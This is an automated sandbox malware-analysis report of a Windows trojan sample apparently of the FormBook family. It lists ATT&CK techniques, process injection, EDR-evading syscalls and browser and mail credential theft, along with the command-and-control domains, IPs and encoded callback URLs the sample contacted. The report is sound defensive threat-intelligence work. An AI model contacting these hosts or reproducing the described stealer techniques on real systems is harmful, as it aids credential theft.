            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529061 Sample: Z6s208B9QX.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 28 www.suarahati20.xyz 2->28 30 www.broomeorchard.xyz 2->30 32 21 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 3 other signatures 2->50 10 Z6s208B9QX.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 UCAmCgWJyh.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 write.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 UCAmCgWJyh.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.broomeorchard.xyz 15.197.204.56, 50014, 50015, 50016 TANDEMUS United States 22->34 36 www.93187.xyz 107.163.130.249, 49998, 49999, 50000 TAKE2US United States 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Z6s208B9QX.exe71%ReversingLabsWin32.Trojan.Autoitinject
            Z6s208B9QX.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            tempatmudisini01.click
            		103.21.221.4
            		truetrue
              		unknown
              www.nmh6.site
              		43.154.104.247
              		truetrue
                		unknown
                www.zenscape.top
                		199.192.21.169
                		truetrue
                  		unknown
                  www.broomeorchard.xyz
                  		15.197.204.56
                  		truetrue
                    		unknown
                    o731lh.vip
                    		3.33.130.190
                    		truetrue
                      		unknown
                      asociacia.online
                      		81.2.196.19
                      		truetrue
                        		unknown
                        hse6978h2.g.asiagoogleantiddoscdn.com
                        		23.224.37.76
                        		truetrue
                          		unknown
                          whats-in-the-box.org
                          		3.33.130.190
                          		truetrue
                            		unknown
                            suarahati20.xyz
                            		198.252.106.191
                            		truetrue
                              		unknown
                              www.93187.xyz
                              		107.163.130.249
                              		truetrue
                                		unknown
                                xzwp.g.zxy-cname.com
                                		20.184.53.162
                                		truetrue
                                  		unknown
                                  consultarfacil.online
                                  		3.33.130.190
                                  		truetrue
                                    		unknown
                                    www.suarahati20.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.consultarfacil.online
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.o731lh.vip
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.whats-in-the-box.org
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.insicilia.today
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.asociacia.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.52ywq.vip
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.tempatmudisini01.click
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.1183377.app
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.tempatmudisini01.click/abla/true
                                                        		unknown
                                                        http://www.zenscape.top/d8cw/?gP=ygF20N1+ik7kBOtBXXgSSDl+0mvoPS6R8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5otm2v66eMoudDkD1QDiauZF6PALhNXvt3BHI=&-L=kBMxZFRpAD6Ptrue
                                                          		unknown
                                                          http://www.93187.xyz/jyeu/?gP=KiLVsdjbhLGFnrJehKTzSS0IkzcAWv/LJ+iUpFrqUMB7t1Dgy4rxQKgK0ZJ2vypsgoxK5tfcGeo5lfiWWTY3/QPGqQrPglnah1puMp4IzQunG6SYXgyDdEY=&-L=kBMxZFRpAD6Ptrue
                                                            		unknown
                                                            http://www.nmh6.site/8qne/true
                                                              		unknown
                                                              http://www.consultarfacil.online/2ho9/?gP=sZDoihg8ajsFNu4sFB4wVMG24nWUkQUSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3H5WrA65sHfIkn+XzJEmDgF1B4fp1cD4x67M=&-L=kBMxZFRpAD6Ptrue
                                                                		unknown
                                                                http://www.suarahati20.xyz/4est/true
                                                                  		unknown
                                                                  http://www.1183377.app/8z5k/true
                                                                    		unknown
                                                                    http://www.broomeorchard.xyz/8o1o/true
                                                                      		unknown
                                                                      http://www.suarahati20.xyz/4est/?gP=6TioOITzTznuWaHCUWnl//RNTiJIkSIqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5KDSFFDUFbTukXlY89F3XW39p23v05UDH3lWqOp67DGsRlWdM=&-L=kBMxZFRpAD6Ptrue
                                                                        		unknown
                                                                        http://www.asociacia.online/jsqu/?-L=kBMxZFRpAD6P&gP=j6JGavFFAQYaoSsk3MdZismLyTuecDBS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuAECuXdbdVwd/lx4BGGAWHgBLP9AhssTD5eI=true
                                                                          		unknown
                                                                          http://www.broomeorchard.xyz/8o1o/?-L=kBMxZFRpAD6P&gP=QunhVm6kZFQCJjGkuC7lsmN7UDLhVH5unS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjT9kB1XQFiuYG2+iOt7QfZQyJLxqfhY4aAGU=true
                                                                            		unknown
                                                                            http://www.nmh6.site/8qne/?-L=kBMxZFRpAD6P&gP=KTDLAip6979182YpgYgwlP0twqrvN2KjRu9dlBr1KRF7u6Oe/Vup1PLCUBiG85sopIJcMB3IBfxfJF1E2Fdczwn6nM8FHB3uPZpUzCEofVeYgOE3F6jmTm8=true
                                                                              		unknown
                                                                              http://www.52ywq.vip/4i87/true
                                                                                		unknown
                                                                                http://www.52ywq.vip/4i87/?-L=kBMxZFRpAD6P&gP=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVpZIGkHJVy9sLRLBvFWiGcqamlVlCdw8MyQ8=true
                                                                                  		unknown
                                                                                  http://www.o731lh.vip/xweg/true
                                                                                    		unknown
                                                                                    http://www.asociacia.online/jsqu/true
                                                                                      		unknown
                                                                                      http://www.consultarfacil.online/2ho9/true
                                                                                        		unknown
                                                                                        http://www.tempatmudisini01.click/abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIP+nYbA/MCobApDN+18WI9d8e3Vo/1w2CbZc=&-L=kBMxZFRpAD6Ptrue
                                                                                          		unknown
                                                                                          http://www.93187.xyz/jyeu/true
                                                                                            		unknown
                                                                                            http://www.zenscape.top/d8cw/true
                                                                                              		unknown

                                                                                              URLs from Memory and Binaries

                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                              http://tempatmudisini01.click/abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqswrite.exe, 0000000B.00000002.3747327536.0000000005C22000.00000004.10000000.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.00000000039E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://duckduckgo.com/chrome_newtabwrite.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.nmh6.siteUCAmCgWJyh.exe, 0000000D.00000002.3748863633.0000000004F8E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://duckduckgo.com/ac/?q=write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://login.live.cwrite.exe, 0000000B.00000002.3743884868.0000000002B65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://www.ecosia.org/newtab/write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://ac.ecosia.org/autocomplete?q=write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://6329.vhjhbv.com/4i87/?-L=kBMxZFRpAD6P&gP=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCwrite.exe, 0000000B.00000002.3747327536.0000000005448000.00000004.10000000.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.0000000003208000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwrite.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      103.21.221.4
                                                                                                      		tempatmudisini01.clickunknown
                                                                                                      		9905LINKNET-ID-APLinknetASNIDtrue
                                                                                                      199.192.21.169
                                                                                                      		www.zenscape.topUnited States
                                                                                                      		22612NAMECHEAP-NETUStrue
                                                                                                      107.163.130.249
                                                                                                      		www.93187.xyzUnited States
                                                                                                      		20248TAKE2UStrue
                                                                                                      198.252.106.191
                                                                                                      		suarahati20.xyzCanada
                                                                                                      		20068HAWKHOSTCAtrue
                                                                                                      20.184.53.162
                                                                                                      		xzwp.g.zxy-cname.comUnited States
                                                                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                      43.154.104.247
                                                                                                      		www.nmh6.siteJapan4249LILLY-ASUStrue
                                                                                                      23.224.37.76
                                                                                                      		hse6978h2.g.asiagoogleantiddoscdn.comUnited States
                                                                                                      		40065CNSERVERSUStrue
                                                                                                      81.2.196.19
                                                                                                      		asociacia.onlineCzech Republic
                                                                                                      		24806INTERNET-CZKtis238403KtisCZtrue
                                                                                                      3.33.130.190
                                                                                                      		o731lh.vipUnited States
                                                                                                      		8987AMAZONEXPANSIONGBtrue
                                                                                                      15.197.204.56
                                                                                                      		www.broomeorchard.xyzUnited States
                                                                                                      		7430TANDEMUStrue

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1529061
                                                                                                      Start date and time:2024-10-08 15:53:02 +02:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 10m 36s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:19
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:2
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:Z6s208B9QX.exe
                                                                                                      renamed because original name is a hash value
                                                                                                      Original Sample Name:e24039b0b5c049807d966f0215f595410392fd4bc65142f101dc3282b6f75aa5.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/2@13/10
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 75%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 92%
                                                                                                      • Number of executed functions: 51
                                                                                                      • Number of non-executed functions: 302
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: Z6s208B9QX.exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      09:55:17API Interceptor9318139x Sleep call for process: write.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      103.21.221.4-pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.tempatmudisini01.click/iydt/
                                                                                                      UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • www.tempatmudisini01.click/iydt/
                                                                                                      RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.tempatmudisini01.click/abla/
                                                                                                      Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.tempatmudisini01.click/phdl/
                                                                                                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.tempatmudisini01.click/lybf/
                                                                                                      SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.tempatmudisini01.click/r9rj/
                                                                                                      SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.tempatmudisini01.click/abla/
                                                                                                      199.192.21.1698mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.cenfresh.life/6iok/
                                                                                                      PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.selftip.top/85su/
                                                                                                      update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.technectar.top/ghvt/
                                                                                                      NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.selftip.top/85su/
                                                                                                      RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.zenscape.top/d8cw/
                                                                                                      Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.zenscape.top/d8cw/
                                                                                                      DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.selftip.top/85su/
                                                                                                      DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.urbanpulse.help/r50h/
                                                                                                      PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.selftip.top/85su/
                                                                                                      SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.zenscape.top/d8cw/
                                                                                                      107.163.130.249PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.93187.xyz/jd6t/
                                                                                                      RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.93187.xyz/jyeu/
                                                                                                      SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.93187.xyz/jyeu/
                                                                                                      New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.93187.xyz/jd6t/

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      www.zenscape.topRFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 199.192.21.169
                                                                                                      Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 199.192.21.169
                                                                                                      SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 199.192.21.169
                                                                                                      hse6978h2.g.asiagoogleantiddoscdn.comDHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 156.251.233.85
                                                                                                      RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 23.224.27.173
                                                                                                      www.broomeorchard.xyzN2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 15.197.204.56
                                                                                                      RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 15.197.204.56
                                                                                                      www.nmh6.siteShipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 43.154.104.247
                                                                                                      shipping notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 43.154.104.247
                                                                                                      RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 43.154.104.247

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      TAKE2USna.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 107.163.175.138
                                                                                                      PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 107.163.130.249
                                                                                                      RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 107.163.130.249
                                                                                                      SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 107.163.130.249
                                                                                                      New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 107.163.130.249
                                                                                                      Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 23.231.158.3
                                                                                                      quotation.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                                      • 23.231.158.3
                                                                                                      #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 23.231.158.3
                                                                                                      Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 23.231.158.3
                                                                                                      Contract.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 23.231.158.3
                                                                                                      LINKNET-ID-APLinknetASNIDna.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 139.41.97.67
                                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 139.16.199.224
                                                                                                      na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 139.34.248.222
                                                                                                      -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.21.221.4
                                                                                                      P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.21.221.87
                                                                                                      UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 103.21.221.4
                                                                                                      RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.21.221.4
                                                                                                      Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.21.221.4
                                                                                                      jNGMZWmt23.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 139.37.141.74
                                                                                                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.21.221.4
                                                                                                      HAWKHOSTCAPURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 198.252.106.191
                                                                                                      PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 198.252.106.191
                                                                                                      RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 198.252.106.191
                                                                                                      PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 198.252.106.191
                                                                                                      BL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 198.252.106.136
                                                                                                      PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 198.252.106.191
                                                                                                      file No83293 PO & Specification.gz.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 198.252.106.241
                                                                                                      vm6XYZzWOd.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                                                                      • 198.252.105.116
                                                                                                      1AIemYSAZy.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                                                      • 198.252.102.119
                                                                                                      ENEDGCErLu.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, SystemBCBrowse
                                                                                                      • 198.252.102.119
                                                                                                      NAMECHEAP-NETUS5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 162.0.236.169
                                                                                                      jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 63.250.47.40
                                                                                                      ItPTgiBC07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                      • 198.54.122.135
                                                                                                      N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 199.192.19.19
                                                                                                      q6utlq83i0.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 198.54.122.135
                                                                                                      RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 162.0.238.43
                                                                                                      8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 199.192.21.169
                                                                                                      FDA.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 198.54.125.199
                                                                                                      PURCHASED ORDER OF ENG091.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 63.250.38.167
                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 162.255.117.53

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Temp\7251G3-6

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\write.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                      Category:dropped
                                                                                                      Size (bytes):196608
                                                                                                      Entropy (8bit):1.1209935793793442
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                                                                      MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                                                                      SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                                                                      SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                                                                      SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\nonagglutinant

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\Z6s208B9QX.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):287744
                                                                                                      Entropy (8bit):7.994641784324539
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:6144:zcPFP4/VDsdhkdSKY4cEcuDtpTu/iK9fA1x1yNNrvO:zmpEDIkEJifKiEA1x8fvO
